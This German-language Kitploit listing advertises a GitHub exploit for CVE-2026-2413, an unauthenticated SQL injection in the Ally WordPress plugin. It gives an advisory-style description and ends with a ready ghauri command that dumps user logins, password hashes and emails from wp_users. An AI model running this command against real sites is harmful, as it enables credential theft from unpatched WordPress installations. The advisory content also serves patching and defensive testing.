Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-2413 — Ally – Web-Barrierefreiheit & Benutzerfreundlichkeit <= 4.0.3 - Nicht authentifizierte SQL-Injection über den URL-Pfad | Kitploit
Tools/GitHubGitHub/randomrobbiebf/cve-2026-2413
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubrandomrobbiebf/cve-2026-2413

CVE-2026-2413

Ally – Web-Barrierefreiheit & Benutzerfreundlichkeit <= 4.0.3 - Nicht authentifizierte SQL-Injection über den URL-Pfad

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-2413

Ally – Web Accessibility & Usability <= 4.0.3 - Nicht authentifizierte SQL-Injection über den URL-Pfad

Beschreibung

Das Ally – Web Accessibility & Usability Plugin für WordPress ist in allen Versionen bis einschließlich 4.0.3 anfällig für SQL-Injection über den URL-Pfad. Dies ist auf unzureichendes Escaping des vom Benutzer bereitgestellten URL-Parameters in der Methode get_global_remediations() zurückzuführen, wo er direkt in eine SQL-JOIN-Klausel eingefügt wird, ohne ordnungsgemäße Bereinigung für den SQL-Kontext. Obwohl esc_url_raw() für die URL-Sicherheit angewendet wird, verhindert es nicht, dass SQL-Metazeichen (einfache Anführungszeichen, Klammern) injiziert werden. Dadurch können nicht authentifizierte Angreifer zusätzliche SQL-Abfragen an bereits vorhandene Abfragen anhängen, die verwendet werden können, um vertrauliche Informationen aus der Datenbank mithilfe von zeitbasierten Blind-SQL-Injection-Techniken zu extrahieren. Das Remediation-Modul muss aktiv sein, was erfordert, dass das Plugin mit einem Elementor-Konto verbunden ist.

Details

  • Typ: Plugin
  • Slug: pojo-accessibility
  • Betroffene Version:
  • CVSS-Score: 7.5
  • CVSS-Bewertung: Hoch
  • CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2026-2413

POC

root@kitploit:~
ghauri -u "http://localhost:9001/x*" --technique=E --dbms=mysql --batch --ignore-code 404 --skip-urlencode --prefix="'" --suffix="OR'" -D wordpress -T wp_users -C user_login,user_pass,user_email --dump
Tool herunterladen